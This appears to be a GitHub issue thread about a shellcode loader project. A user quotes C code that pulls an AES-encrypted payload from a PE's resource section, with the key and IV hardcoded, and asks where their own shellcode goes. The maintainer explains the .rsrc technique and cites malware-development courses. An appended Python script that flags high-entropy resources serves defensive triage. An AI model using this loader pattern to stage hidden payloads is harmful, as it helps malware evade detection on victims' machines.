tehstoni / breadloader


loader #1

Closed sec13b closed 2 weeks ago

sec13b commented 3 weeks ago

Can I know what this loads?


    char * payload;

    payload = (char *) LockResource(resHandle);

    int payload_len = SizeofResource(NULL, res);

    unsigned char AesKey[] = {
        0xF7, 0xA8, 0x64, 0xF4, 0x6A, 0x47, 0xDF, 0xBD, 0xA6, 0x11, 0x4B, 0x5D, 0x54, 0x99, 0x3C, 0x2E, 
        0x38, 0x24, 0x38, 0xAA, 0xB7, 0x15, 0x60, 0x7E, 0x96, 0xA8, 0x52, 0xDF, 0x04, 0xE3, 0x4F, 0x21 };

    unsigned char AesIv[] = {
        0x38, 0xC6, 0x7E, 0x1C, 0x24, 0xD6, 0x0F, 0x67, 0x82, 0x3C, 0xA2, 0x9F, 0x47, 0xE4, 0x05, 0xA8 };

    //SimpleDecryption(payload, payload_len, AesKey, AesIv, &pPlaintext, &dwPlainSize);

Thank you

tehstoni commented 3 weeks ago

Are you asking what is being loaded? Or what exactly?

sec13b commented 3 weeks ago

I don't see where I need to add "my" shellcode

tehstoni commented 3 weeks ago

This one loads the payload from the .rsrc section of the PE. Maldev Academy and Sektor7 Essentials both teach how to do this.
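For triage of a sample built this way, the sketch below walks a PE resource directory and flags large, near-random resources, which is how an encrypted blob stored in .rsrc tends to stand out. It is an added example, not part of the thread or the project's code. It assumes the caller has already carved the raw .rsrc section and knows its VirtualAddress; `walk`, `suspicious`, the 7.2 bits/byte threshold, the 256-byte minimum and the sample bytes are all constructed for illustration.

```python
import hashlib, math, struct
from collections import Counter

SUBDIR = 0x80000000  # high bit set: entry points at a subdirectory (or a name string)

def entropy(data):
    """Shannon entropy in bits per byte (0.0 to 8.0)."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def walk(rsrc, va, off=0, path=(), depth=0):
    """Yield (id_path, data) for each leaf of the .rsrc directory tree."""
    if depth > 2 or off + 16 > len(rsrc):  # type/name/language only; stops loops
        return
    named, ids = struct.unpack_from("<HH", rsrc, off + 12)
    for e in range(off + 16, off + 16 + 8 * (named + ids), 8):
        if e + 8 > len(rsrc):
            return
        name, target = struct.unpack_from("<II", rsrc, e)
        here = path + ("<named>" if name & SUBDIR else name,)
        if target & SUBDIR:
            yield from walk(rsrc, va, target & 0x7FFFFFFF, here, depth + 1)
        elif target + 16 <= len(rsrc):
            rva, size = struct.unpack_from("<II", rsrc, target)
            start = rva - va  # data entries hold RVAs, not section offsets
            if 0 <= start <= start + size <= len(rsrc):
                yield here, rsrc[start:start + size]

def suspicious(rsrc, va, min_size=256, threshold=7.2):
    """Return [(id_path, size, entropy)] for large, near-random resources."""
    scored = ((p, len(d), round(entropy(d), 2)) for p, d in walk(rsrc, va))
    return [s for s in scored if s[1] >= min_size and s[2] >= threshold]

def _dir(entries):
    head = struct.pack("<IIHHHH", 0, 0, 0, 0, 0, len(entries))
    return head + b"".join(struct.pack("<II", i, t) for i, t in entries)

def constructed_sample(va):
    """Constructed .rsrc bytes: RCDATA 101 is random-looking, 102 is plain text."""
    blob = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(64))
    text = b"<assembly manifestVersion='1.0'/>" * 40
    leaves = struct.pack("<IIII", va + 136, len(blob), 0, 0)
    leaves += struct.pack("<IIII", va + 136 + len(blob), len(text), 0, 0)
    return (_dir([(10, SUBDIR | 24)]) + _dir([(101, SUBDIR | 56), (102, SUBDIR | 80)])
            + _dir([(1033, 104)]) + _dir([(1033, 120)]) + leaves + blob + text)

if __name__ == "__main__":
    for hit in suspicious(constructed_sample(0x4000), 0x4000):
        print(hit)
```

Compressed resources such as PNG icons also score high, so a hit is a reason to look closer (an RT_RCDATA entry with no recognisable file header, for instance), not a verdict.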